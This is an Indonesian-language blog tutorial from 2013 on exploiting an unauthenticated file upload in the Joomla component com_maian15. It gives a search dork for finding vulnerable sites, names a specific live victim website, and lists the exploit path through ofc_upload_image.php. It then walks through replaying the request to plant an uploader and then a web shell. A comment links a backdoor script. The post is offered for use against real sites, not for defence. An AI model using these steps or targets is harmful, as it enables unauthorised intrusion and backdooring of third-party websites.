April 10, 2025 04:03:19 PM Menu
» » » Exploit Joomla component com_maian15 upload shell Vulnerability

peace

okedeh cekidot:
cari target dlu..

Dork: inurl:"option=com_maian15"
silahkan dikembangkan piss

disini ane kasih 1 live target..
http://www.akindeledecker.com/C2-LyricalOverflow/

exploit:
administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=cekson.php

langsung inject om,..
http://www.akindeledecker.com/C2-Lyrical...cekson.php

NB: sebenarnya ntuh file udah terupload.. dgn nama file cekson.php tapi isi filenya gak ada hammer

lanjut,. kita gunakan live http header (add on moksilla hammer)
klik replay..


langsung parkir backdoor ketawa tapi disini ane gak langsung parkir backdoor hammer , ane cuma parkir uploader hmm
uploader dari om unyil malu


klik replay

dan walaaaa... shock
uploader ane sdh tertanam kalem
direktori file:
administrator/components/com_maian15/charts/tmp-upload-images/cekson.php

Sekarang tinggal upload "the real shell" :P

sekian tutor cupu dari ane

Maaf trit nnya berantakan :ngakak malas edit T.T




mohon
06 Dec 2013
Diposkan oleh
Label: ,
di 11:39 AM

2 komentar:

  1. AnonymousDecember 7, 2013 at 7:54 AM

    keren :o

    ReplyDelete
  2. HendraDecember 9, 2013 at 10:13 PM

    isi dgn script backdoor agan :)
    kalau mau upload uploader, silahkan pake script ini:

    http://pastebin.com/Hn4MEUyD

    ReplyDelete

:) :)) ;(( :-) =)) ;( ;-( :d :-d @-) :p :o :>) (o) [-( :-? (p) :-s (m) 8-) :-t :-b b-( :-# =p~ $-) (b) (f) x-) (k) (h) (c) cheer
Click to see the code!
To insert emoticon you must added at least one space before the code.

Subscribe to: Post Comments (Atom)
 
Top